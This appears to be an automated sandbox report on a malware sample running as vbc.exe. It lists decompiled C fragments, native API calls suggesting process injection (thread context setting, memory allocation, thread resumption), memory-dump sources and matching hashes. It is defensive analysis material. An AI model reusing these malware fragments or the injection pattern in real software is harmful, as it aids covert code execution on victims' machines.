Opcode ID: e0106c0a0175a9692965a7715842e86baf34b8f552730bc1c22477b6ee5bdc37
Instruction ID: 2fc9afd75f3dc6635cdbf54b140e5ed5f2dba1c741ecb156ba7235d97f3da162
Opcode Fuzzy Hash: e0106c0a0175a9692965a7715842e86baf34b8f552730bc1c22477b6ee5bdc37
Instruction Fuzzy Hash: 273189B8D002589FCF10CFA9E884ADEFBB5BF49314F14A42AE815B7210D735A945CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0036F7F8, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0036F8A7

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0505496845e2914206da72e0391de615ccaa7413f51459ac76f5185bc0c35866
Instruction ID: 1e5dcbc7d7d06d9d9cb49ebc045d182d153349a885bf65fdec7882ce69375018
Opcode Fuzzy Hash: 0505496845e2914206da72e0391de615ccaa7413f51459ac76f5185bc0c35866
Instruction Fuzzy Hash: 0731BBB4D012589FCB10CFAAD884AEEFBF5BF49314F24942AE414B7244D778A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0036F708, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0036F786

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 31f2af8cde8c00998ea4b59476015f37ff589a533ce3f9596f060f2ca648bb1c
Instruction ID: 66aa833a11ea0b86028f8e0cecdc4048f85427d83ce3f66a8144d78cf0a16781
Opcode Fuzzy Hash: 31f2af8cde8c00998ea4b59476015f37ff589a533ce3f9596f060f2ca648bb1c
Instruction Fuzzy Hash: 543189B4D012189FCB14CFA9E884ADEFBB5AF49314F24982AE815B7300D775A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0020D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2168263121.000000000020D000.00000040.00000001.sdmp, Offset: 0020D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b9c3938719bbc57cefd5d2ea676a750b7e3c841bfb125b833c45c931f4a55e0
Instruction ID: 7900d2399174e7ecd633d208bae213a9c3696d2a21c48fbffcf1840a0b8f8249
Opcode Fuzzy Hash: 0b9c3938719bbc57cefd5d2ea676a750b7e3c841bfb125b833c45c931f4a55e0
Instruction Fuzzy Hash: AA21F275614304DFDB14CFA4D984B16BBA6EB84314F24C969D80D4B287C377D827CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0020D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2168263121.000000000020D000.00000040.00000001.sdmp, Offset: 0020D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
Instruction ID: 3c7c67c36105d64d12a5034d2ce3669064eda79ac2901ddba4ae97b5ed9755ba
Opcode Fuzzy Hash: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
Instruction Fuzzy Hash: 2E118B75504380DFCB15CF54D584B15BBA2FB84314F28C6AAD8094B696C33AD85BCBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00368740, Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

@2Dm, xrefs: 00368954

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID:
String ID: @2Dm
API String ID: 0-984162619
Opcode ID: 4458bd30e7525908886c29f00cba4aeee82597667cf3741e283779d4bfa1b345
Instruction ID: 400809e9fb365dbfe49615fd94bd7b146084c174aeab68963025a18885c1ba06
Opcode Fuzzy Hash: 4458bd30e7525908886c29f00cba4aeee82597667cf3741e283779d4bfa1b345
Instruction Fuzzy Hash: 935180789006098FD746DFB9E890BDDBBF7EF85304F10C92AD0059B268EB715945CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00368750, Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

@2Dm, xrefs: 00368954

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID:
String ID: @2Dm
API String ID: 0-984162619
Opcode ID: 9fd209e4304eca988e10a22091f7c8d8764a5b8987a3af465f2946d2d987585f
Instruction ID: 6b8f26c3e545cf23b14d6851c6017ec4d85c63e047af3ca15d34e515bcf2ef35
Opcode Fuzzy Hash: 9fd209e4304eca988e10a22091f7c8d8764a5b8987a3af465f2946d2d987585f
Instruction Fuzzy Hash: 945161789006098FD74ADFB9D890B9DBBF7EF85304F10C93AD0159B268EB7159458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00368998, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea71b29ee16772ef93540bf054cae252a8baa605788f41593a0918369331263
Instruction ID: 1716a844c8b40c9bfedc42a9f8b99ad161601d8c841f8ee6034dbc94dccc8e76
Opcode Fuzzy Hash: 6ea71b29ee16772ef93540bf054cae252a8baa605788f41593a0918369331263
Instruction Fuzzy Hash: E34143B1E056588BEB1DCF67CD4078AFAF7BFC9300F14C5BA850DAA215DB7005868E55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 2752 Parent PID: 2812 vbc.exeCOMMON

Executed Functions

Function 0041825C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041825C(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t19;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t14 = _a4;
				_t31 = _a4 + 0xc48;
				E00418DB0(_t29, _t14, _t31,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t19 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t30, _t33, _t33); // executed
				return _t19;
			}

0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: 4441afe5b480c445e4af10c8f8922edbca3054b1a75dd2a3f5190de206556e4d
Instruction ID: de943160e91b2097658b8561939ebe43a0bc68e98f7736045236968f0c5998ef
Opcode Fuzzy Hash: 4441afe5b480c445e4af10c8f8922edbca3054b1a75dd2a3f5190de206556e4d
Instruction Fuzzy Hash: 7DF0E2B2200208AFCB04DF89DC90EEB77ADAF8C714F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B10(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181AA, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181AA(void* __eax, void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t25;
				void* _t36;

				 *(__ebx - 0x74aa291a) =  *(__ebx - 0x74aa291a) ^ 0x000000ec;
				_t19 = _a4;
				_t5 = _t19 + 0xc40; // 0xc40
				E00418DB0(_t36, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t25 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t25;
			}

0x004181ac
0x004181b3
0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9bae0eb3ffb6eb6bfd393633e59707b62ba83f9c16c8488c96cd8951ec9eeb85
Instruction ID: d5671a957fbf69f59e2bb38e16f93d8646bb4d8f966cbc3ae5f6cbc16e4c9709
Opcode Fuzzy Hash: 9bae0eb3ffb6eb6bfd393633e59707b62ba83f9c16c8488c96cd8951ec9eeb85
Instruction Fuzzy Hash: 9D01BBB2201104ABCB48CF99DC84DDB77A9AF8C754F15824CFA1D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004182DA(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t12;

				asm("sbb [0x8b556206], ebx");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t12, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182dc
0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4117a5e44119038a2029430489f3d9cd0bc453ede46ecf2d186ff3e06695392c
Instruction ID: bb598f78bcf0176fa49fecb9546cb1be327a81a223d3691381f11588243d921a
Opcode Fuzzy Hash: 4117a5e44119038a2029430489f3d9cd0bc453ede46ecf2d186ff3e06695392c
Instruction Fuzzy Hash: 35E0C276200210BFD710DFA4CC84EE77B68EF44320F10805DFA1D9B281C530E60087E0

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 008500C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008500CF

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00850048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00850053

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00850078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00850086

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 008507AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008507B7

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0084F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084F9FB

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0084F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084F90E

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0084FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FADB

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0084FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0084FAF3

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
